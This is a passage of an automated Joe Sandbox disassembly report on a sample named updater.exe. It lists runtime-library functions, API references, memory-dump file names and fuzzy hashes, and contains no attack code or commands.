Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140CAE5
std::_Lockit::~_Lockit.LIBCPMT ref: 0140CB05
Concurrency::cancel_current_task.LIBCPMT ref: 0140CB12

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 73856317b02e701c784b79547d603da0bb27b635ecc1f6f55da0740e7ac8ca29
Instruction ID: a36ecffd07c17ca7f7acc49fca5caddedb769915338fce409c6027a9e4c10fdf
Opcode Fuzzy Hash: 73856317b02e701c784b79547d603da0bb27b635ecc1f6f55da0740e7ac8ca29
Instruction Fuzzy Hash: E5010036D00116CBCB06EB6A8844AAEBB70BFA0614F28415EE801672F0CF748E05DB82

Uniqueness

Uniqueness Score: -1.00%

Function 01406FD4 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01406FE5
int.LIBCPMT ref: 01406FFC

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 01407036
std::_Lockit::~_Lockit.LIBCPMT ref: 01407056
Concurrency::cancel_current_task.LIBCPMT ref: 01407063

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 14fd68376fb662fe353480bee5e8ffdf713fc02cfb6bb4594a652dff0eae4d5a
Instruction ID: 47d6eb09f3862ccfc32e79ed890c5c21ff8ff3b274fbad7fd103d712cfe4c531
Opcode Fuzzy Hash: 14fd68376fb662fe353480bee5e8ffdf713fc02cfb6bb4594a652dff0eae4d5a
Instruction Fuzzy Hash: 5B012679D001168BDB06EB6AC840ABEB771BFA0719F18411ED811673F0CF34AE01CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01407069 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140707A
int.LIBCPMT ref: 01407091

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 014070CB
std::_Lockit::~_Lockit.LIBCPMT ref: 014070EB
Concurrency::cancel_current_task.LIBCPMT ref: 014070F8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 451e2aa763aa79c1972856a85d7ba441d6b31e88073d8b90d01f9df3770b070d
Instruction ID: c4157dec4d9c7d35fd25c5800489e89bbbcb3c55aec2113a07f9dbd025c233a2
Opcode Fuzzy Hash: 451e2aa763aa79c1972856a85d7ba441d6b31e88073d8b90d01f9df3770b070d
Instruction Fuzzy Hash: 8101D279D002169BDB16EB69C804ABEBB70BFA4615F18811ED811677F0CF34AE05D782

Uniqueness

Uniqueness Score: -1.00%

Function 01419541 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01419552
int.LIBCPMT ref: 01419569

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 014195A3
std::_Lockit::~_Lockit.LIBCPMT ref: 014195C3
Concurrency::cancel_current_task.LIBCPMT ref: 014195D0

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 90788c4b71055de023fc96c8b062be6d9d92d77c5d165edfbb8c3025c5edd9d6
Instruction ID: ec5972060c7250168b6132240b9664d5c4c3cc7f454857d4b1c91f788aee0c3c
Opcode Fuzzy Hash: 90788c4b71055de023fc96c8b062be6d9d92d77c5d165edfbb8c3025c5edd9d6
Instruction Fuzzy Hash: F301C4369002168BCB05EB69C824AAEB7A5BFA0718F18404ED905672F5DF749A05C781

Uniqueness

Uniqueness Score: -1.00%

Function 014195D6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014195E7
int.LIBCPMT ref: 014195FE

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 01419638
std::_Lockit::~_Lockit.LIBCPMT ref: 01419658
Concurrency::cancel_current_task.LIBCPMT ref: 01419665

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 1a37ffe4a8fb97cdb4046619566704fb06d3747322d103502d05f879a9db0032
Instruction ID: c27dc797fc13b071c1bc27e05c62581bd012021e419da4f579ca42d0c6c81d66
Opcode Fuzzy Hash: 1a37ffe4a8fb97cdb4046619566704fb06d3747322d103502d05f879a9db0032
Instruction Fuzzy Hash: 3A0126359002169FDB05EB68C814ABEB774BFA0B18F18440ED808A73F5CF348E01C791

Uniqueness

Uniqueness Score: -1.00%

Function 01419795 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014197A6
int.LIBCPMT ref: 014197BD

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 014197F7
std::_Lockit::~_Lockit.LIBCPMT ref: 01419817
Concurrency::cancel_current_task.LIBCPMT ref: 01419824

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: bffba5a7e0eef1080c3b0a5101e43394cb417cfed2490042ded5b8ac0f76e28f
Instruction ID: 0f0147b4e10fc723e90b5d1342bcfbbe850e24e5561fe5a0428f398dad015ae4
Opcode Fuzzy Hash: bffba5a7e0eef1080c3b0a5101e43394cb417cfed2490042ded5b8ac0f76e28f
Instruction Fuzzy Hash: 9201C035900116CFCB16EB69D824ABEBBB1BFA0B28F18411ED815672F5DF349E05C791

Uniqueness

Uniqueness Score: -1.00%

Function 014396D1 Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 014396E9

Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B

_free.LIBCMT ref: 014396FB
_free.LIBCMT ref: 0143970D
_free.LIBCMT ref: 0143971F
_free.LIBCMT ref: 01439731

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: faba9e9e867089c7c6633616270c6cc7fc3fe247953bfc68d6a6640373965b35
Instruction ID: 3adfa39a1ceccbd16d7ce96bee0fa8573fed00f8285a65d5d81fb9850364769c
Opcode Fuzzy Hash: faba9e9e867089c7c6633616270c6cc7fc3fe247953bfc68d6a6640373965b35
Instruction Fuzzy Hash: 19F04F72504200B7DA35DA6DE4C0C1B77DEEB98358764180AF258D7670C7B5FD80CA94

Uniqueness

Uniqueness Score: -1.00%

Function 013C2685 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 013C268C
_Deallocate.LIBCONCRT ref: 013C2769

Strings

: ", xrefs: 013C2786
", ", xrefs: 013C27A5

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: DeallocateH_prolog2
String ID: ", "$: "
API String ID: 1002199092-747220369
Opcode ID: f3cfdbdf451df3c531620562c061848f5bee16f259307060a5d7bc492110e67b
Instruction ID: ec2df5b2da4580c9dc83f9f0958878f458c828066b058239ae3b284ec3b88674
Opcode Fuzzy Hash: f3cfdbdf451df3c531620562c061848f5bee16f259307060a5d7bc492110e67b
Instruction Fuzzy Hash: B041F471A00205AFDF05DF68D884BAEBBB5FF54714F04016EE801AB291D774AD45CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0141C2A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0141C2AA

Part of subcall function 01406F3F: std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
Part of subcall function 01406F3F: int.LIBCPMT ref: 01406F67
Part of subcall function 01406F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1

_Find_elem.LIBCPMT ref: 0141C344

Strings

0123456789-, xrefs: 0141C2F6
0123456789-, xrefs: 0141C2F1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789-$0123456789-
API String ID: 2124549159-2494171821
Opcode ID: 7f1ba9481ad5884c40d8057604eb3d9630049414aa1311712b8d974feb7d484e
Instruction ID: c468d2e0795c3913b588f51f05490215e0ffa79071c70e601ba342bb6032470d
Opcode Fuzzy Hash: 7f1ba9481ad5884c40d8057604eb3d9630049414aa1311712b8d974feb7d484e
Instruction Fuzzy Hash: 3941AD32D0020DEFDF09DF98D980AEEBBB9FF14314F10005AE911A72A5DB759A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0142D249 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

+7, xrefs: 0142D29A
C:\Users\user\Desktop\updater.exe, xrefs: 0142D28C, 0142D293, 0142D2C9

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: +7$C:\Users\user\Desktop\updater.exe
API String ID: 0-1940217829
Opcode ID: a42d43814fa25c464115f0a19a1318ce890639357de0e850bb12483953c564dd
Instruction ID: 44da6c2b76cb52e89c137fb335c0d3cdef9efc1e82395cf2fc32f8a1369a5648
Opcode Fuzzy Hash: a42d43814fa25c464115f0a19a1318ce890639357de0e850bb12483953c564dd
Instruction Fuzzy Hash: 3F4164B1E00225AFDB259FDAD88099FBBF8EF99710B54006BE504D7370D7709A81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01412666 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_Getvals.LIBCPMT ref: 014126BF
_Mpunct.LIBCPMT ref: 014126FA
_Mpunct.LIBCPMT ref: 01412714

Strings

$+xv, xrefs: 0141271F

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Mpunct$Getvals
String ID: $+xv
API String ID: 455491934-1686923651
Opcode ID: 5522329ac7d3dfacc1e3c7776a46a5a7eca137f5738b5feceda228f9a648aa1d
Instruction ID: af099e9a0b424d7492d66b1bdb637b6a9d443900076d83824cb9e6c7e040b388
Opcode Fuzzy Hash: 5522329ac7d3dfacc1e3c7776a46a5a7eca137f5738b5feceda228f9a648aa1d
Instruction Fuzzy Hash: D921B2B1904B526FD722DF768890B7BBEF8AB28200F14095FE499C7A90D774E651CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E0F1B Relevance: 6.3, APIs: 4, Instructions: 348COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 013E1004
__aulldiv.LIBCMT ref: 013E101B
__aullrem.LIBCMT ref: 013E1026
__aulldvrm.LIBCMT ref: 013E1085

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __aullrem$__aulldiv__aulldvrm
String ID:
API String ID: 181600486-0
Opcode ID: 9c5e87da7cc41940317fd15cfea210bbc745300c47bd6eb69c7d484723a16a8e
Instruction ID: 759e8e8c4ba391897fa45c1958e8b3bf9e001fa14035f68a4de34cb3ac702f8e
Opcode Fuzzy Hash: 9c5e87da7cc41940317fd15cfea210bbc745300c47bd6eb69c7d484723a16a8e
Instruction Fuzzy Hash: 2ED18E306087918FD72ACE2C849866FBFE1BFCA208F184A5DF5C997291D774D946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0143290A Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01432991

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
Instruction ID: 010048fb4f0c81567d101f9e0d66739c22079b2e083cccc536b330e417aa1540
Opcode Fuzzy Hash: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
Instruction Fuzzy Hash: 19B15B32A002469FDB15CF68C880FEFBBF5EF99350F14806BD955AB361D2B49942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0140D2D0 Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0140D2D7
_strcspn.LIBCMT ref: 0140D33F
_strcspn.LIBCMT ref: 0140D35F
ctype.LIBCPMT ref: 0140D3CD

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: 54f4e3a4878fa29898defe167c0631934a6ba58cd3d0342b83e3aa3f311e97d1
Instruction ID: cbbdcb17482da8050184888862db1638728a54550d7a32994985a679a5cf1703
Opcode Fuzzy Hash: 54f4e3a4878fa29898defe167c0631934a6ba58cd3d0342b83e3aa3f311e97d1
Instruction Fuzzy Hash: 26C17071D00249DFDF15DFD9C984AEEBBB9FF58310F14002AE905AB2A5D730AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0140D61C Relevance: 6.3, APIs: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0140D623
_strcspn.LIBCMT ref: 0140D68B
_strcspn.LIBCMT ref: 0140D6AB
ctype.LIBCPMT ref: 0140D719

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: cc48e82adb332d31cbb183ecb34731f44567de65b8a4a7d1be2f4ba500a74f70
Instruction ID: fb6f36e6130b0f219aec53ded54495083453ab39bc3c792549b8cb05db46afe9
Opcode Fuzzy Hash: cc48e82adb332d31cbb183ecb34731f44567de65b8a4a7d1be2f4ba500a74f70
Instruction Fuzzy Hash: 2BC17275D0024ADFDF15DFD9C984AEEBBB9FF18310F14042AE909A7264D730AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01407380 Relevance: 6.3, APIs: 4, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01407387
_strcspn.LIBCMT ref: 014073EF
_strcspn.LIBCMT ref: 0140740F
ctype.LIBCPMT ref: 0140747B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strcspn$H_prolog3_ctype
String ID:
API String ID: 838279627-0
Opcode ID: e7d7040d67ec2da2dc489d803d4f2e13575fb3bd6efa0473f278573c39ff703a
Instruction ID: fe8152df7711d82d70ba2907e43f03a89d53b76cdc35b3cc1b14767498f5188e
Opcode Fuzzy Hash: e7d7040d67ec2da2dc489d803d4f2e13575fb3bd6efa0473f278573c39ff703a
Instruction Fuzzy Hash: 0CC1807190024ADFDF16DF99C9809EEBFB9FF18311F14042AE945AB3A1D730A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01421199 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01421260
___AdjustPointer.LIBCMT ref: 01421283
___AdjustPointer.LIBCMT ref: 0142131F

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 64e63b27e12eb1413ee2d37db0e9a926ef610b5954a7201da50871f62c8b3315
Instruction ID: 03b7cf7165eafe253132e9604dd3a01bfc0c5e668816869b251ed751501d3eb8
Opcode Fuzzy Hash: 64e63b27e12eb1413ee2d37db0e9a926ef610b5954a7201da50871f62c8b3315
Instruction Fuzzy Hash: AF51D3B25002269FEB258F59D840B7B7BA5EF25B10F94012FE901E77B0D731A9C1C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01433473 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627792d66e7c881e42c297e03121cb583cd64125a33ab9466e90443b966a2689
Instruction ID: b133b6038990cc40228b13b9872417b22386dfff358a416b1c896eac04a3b620
Opcode Fuzzy Hash: 627792d66e7c881e42c297e03121cb583cd64125a33ab9466e90443b966a2689
Instruction Fuzzy Hash: B841DF76A00215AFE7259F69C840BAABBF8FBAC710F10856FE111DB3A0D275E9408780

Uniqueness

Uniqueness Score: -1.00%

Function 0143F78E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0143F85E
_free.LIBCMT ref: 0143F887
SetEndOfFile.KERNEL32(00000000,0143C3CA,00000000,01430CCF,?,?,?,?,?,?,?,0143C3CA,01430CCF,00000000), ref: 0143F8B9
GetLastError.KERNEL32(?,?,?,?,?,?,?,0143C3CA,01430CCF,00000000,?,?,?,?,00000000), ref: 0143F8D5

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
